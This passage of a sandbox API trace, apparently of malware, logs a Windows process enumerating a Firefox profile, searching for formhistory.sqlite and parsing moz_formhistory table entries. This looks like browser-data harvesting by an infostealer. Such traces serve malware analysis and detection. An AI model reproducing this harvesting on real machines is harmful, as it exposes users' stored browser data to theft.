cb=0x0, dwLockType=0x2) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.107] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.107] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.107] IStream:SetSize (This=0x63a0f8, libNewSize=0x56ffd8) returned 0x0 [0591.107] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x21, cb=0x0, dwLockType=0x0) returned 0x0 [0591.107] IStream:SetSize (This=0x63a0f8, libNewSize=0x58d970) returned 0x0 [0591.107] LocalFree (hMem=0x58d970) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x30, cb=0x0, dwLockType=0x0) returned 0x0 [0591.107] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da93) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0f8, libOffset=0x31, cb=0x0, dwLockType=0x0) returned 0x0 [0591.107] IStream:SetSize (This=0x63a0f8, libNewSize=0x5b7378) returned 0x0 [0591.107] LocalFree (hMem=0x5b7378) returned 0x0 [0591.107] LocalFree (hMem=0x56fe98) returned 0x0 [0591.107] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.107] lstrcmpiA (lpString1="moz_formhistory_index", lpString2="moz_formhistory") returned 1 [0591.107] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.107] LocalFree (hMem=0x5d1978) returned 0x0 [0591.107] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.107] LocalFree (hMem=0x58d970) returned 0x0 [0591.107] LocalFree (hMem=0x5d5258) returned 0x0 [0591.107] LocalFree (hMem=0x56ff38) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0a8, libOffset=0x7d99, cb=0x0, dwLockType=0x0) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0a8, libOffset=0x7d99, cb=0x0, dwLockType=0x0) returned 0x0 [0591.107] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0a8, libOffset=0x7d9a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.107] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.107] IStream:LockRegion (This=0x63a0a8, libOffset=0x7d9b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.107] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.107] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52daf4 | out: ppstm=0x52daf4*=0x63a0f8) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0a8, libOffset=0x7d9c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0a8, libNewSize=0x2f1f7f8) returned 0x0 [0591.108] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2f1f7f8) returned 0x0 [0591.108] LocalFree (hMem=0x2f1f7f8) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.108] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0f8, libNewSize=0x5d1978) returned 0x0 [0591.108] LocalFree (hMem=0x5d1978) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x2a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.108] IStream:SetSize (This=0x63a0f8, libNewSize=0x58d8d8) returned 0x0 [0591.108] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.108] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x39, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da93) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x3a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:SetSize (This=0x63a0f8, libNewSize=0x5d5258) returned 0x0 [0591.109] LocalFree (hMem=0x5d5258) returned 0x0 [0591.109] LocalFree (hMem=0x56ff38) returned 0x0 [0591.109] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.109] lstrcmpiA (lpString1="moz_formhistory_lastused_index", lpString2="moz_formhistory") returned 1 [0591.109] LocalFree (hMem=0x58d970) returned 0x0 [0591.109] LocalFree (hMem=0x63ff30) returned 0x0 [0591.109] LocalFree (hMem=0x56fe98) returned 0x0 [0591.109] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.109] LocalFree (hMem=0x596288) returned 0x0 [0591.109] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0a8, libOffset=0x7d21, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0a8, libOffset=0x7d21, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0a8, libOffset=0x7d22, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:SetSize (This=0x63a0a8, libNewSize=0x52dadf) returned 0x0 [0591.109] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52daf4 | out: ppstm=0x52daf4*=0x63a0f8) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0a8, libOffset=0x7d23, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:SetSize (This=0x63a0a8, libNewSize=0x2f1f7f8) returned 0x0 [0591.109] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2f1f7f8) returned 0x0 [0591.109] LocalFree (hMem=0x2f1f7f8) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.109] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.109] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.110] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.110] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.110] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da9f) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.110] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.110] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.110] IStream:SetSize (This=0x63a0f8, libNewSize=0x5d1978) returned 0x0 [0591.110] LocalFree (hMem=0x5d1978) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x26, cb=0x0, dwLockType=0x0) returned 0x0 [0591.110] IStream:SetSize (This=0x63a0f8, libNewSize=0x58d970) returned 0x0 [0591.110] LocalFree (hMem=0x58d970) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x35, cb=0x0, dwLockType=0x0) returned 0x0 [0591.110] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da93) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.110] IStream:LockRegion (This=0x63a0f8, libOffset=0x36, cb=0x0, dwLockType=0x0) returned 0x0 [0591.110] IStream:SetSize (This=0x63a0f8, libNewSize=0x5b7378) returned 0x0 [0591.110] LocalFree (hMem=0x5b7378) returned 0x0 [0591.110] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.110] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.110] lstrcmpiA (lpString1="moz_formhistory_guid_index", lpString2="moz_formhistory") returned 1 [0591.110] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.110] LocalFree (hMem=0x63ff30) returned 0x0 [0591.110] LocalFree (hMem=0x56ff38) returned 0x0 [0591.110] LocalFree (hMem=0x58d970) returned 0x0 [0591.110] LocalFree (hMem=0x5d5258) returned 0x0 [0591.110] LocalFree (hMem=0x56fe98) returned 0x0 [0591.110] LocalFree (hMem=0x2f0f770) returned 0x0 [0591.110] IUnknown:Release (This=0x63a0a8) returned 0x0 [0591.110] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.110] lstrcmpiW (lpString1="healthreport", lpString2=".") returned 1 [0591.110] lstrcmpiW (lpString1="healthreport", lpString2="..") returned 1 [0591.110] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.110] lstrlenW (lpString="\\") returned 1 [0591.110] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.110] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.110] lstrlenW (lpString="healthreport") returned 12 [0591.110] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.110] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2edf778 [0591.111] LocalFree (hMem=0x63eca8) returned 0x0 [0591.111] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0591.111] lstrlenW (lpString="\\*.*") returned 4 [0591.111] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0591.111] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x2edf8c0 [0591.111] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*.*", lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0x5b9b50 [0591.111] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.111] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.111] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.111] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.111] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0 [0591.111] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.111] LocalFree (hMem=0x2edf8c0) returned 0x0 [0591.111] LocalFree (hMem=0x2edf778) returned 0x0 [0591.111] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.111] lstrlenW (lpString="\\") returned 1 [0591.111] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.111] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.111] lstrlenW (lpString="healthreport.sqlite") returned 19 [0591.111] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.111] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x2edf778 [0591.111] LocalFree (hMem=0x63eca8) returned 0x0 [0591.111] StrStrIW (lpFirst="healthreport.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.111] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.111] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0591.111] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0591.111] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.111] lstrlenW (lpString="\\") returned 1 [0591.111] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.111] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.111] lstrlenW (lpString="indexedDB") returned 9 [0591.111] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.111] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x2edbc08 [0591.111] LocalFree (hMem=0x63eca8) returned 0x0 [0591.111] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0591.111] lstrlenW (lpString="\\*.*") returned 4 [0591.111] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0591.111] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2edf8c0 [0591.111] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*.*", lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0x5b9b50 [0591.111] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.111] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.111] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.112] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.112] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.112] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0591.112] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0591.112] lstrlenW (lpString="\\") returned 1 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0591.112] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x2edbad0 [0591.112] lstrlenW (lpString="moz-safe-about+home") returned 19 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\") returned 86 [0591.112] LocalAlloc (uFlags=0x40, uBytes=0x154) returned 0x2edec90 [0591.112] LocalFree (hMem=0x2edbad0) returned 0x0 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0591.112] lstrlenW (lpString="\\*.*") returned 4 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0591.112] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x2ededf0 [0591.112] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 0x5b9b10 [0591.112] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.112] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 1 [0591.112] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.112] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.112] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 1 [0591.112] lstrlenW (lpString="\\") returned 1 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0591.112] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x2ee2768 [0591.112] lstrlenW (lpString=".metadata") returned 9 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0591.112] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x2ee28c8 [0591.112] LocalFree (hMem=0x2ee2768) returned 0x0 [0591.112] StrStrIW (lpFirst=".metadata", lpSrch="formhistory.sqlite") returned 0x0 [0591.112] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d6c4 | out: lpFindFileData=0x52d6c4) returned 1 [0591.112] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0591.112] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0591.112] lstrlenW (lpString="\\") returned 1 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0591.112] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x2ee2768 [0591.112] lstrlenW (lpString="idb") returned 3 [0591.112] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0591.112] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x2ee2a38 [0591.112] LocalFree (hMem=0x2ee2768) 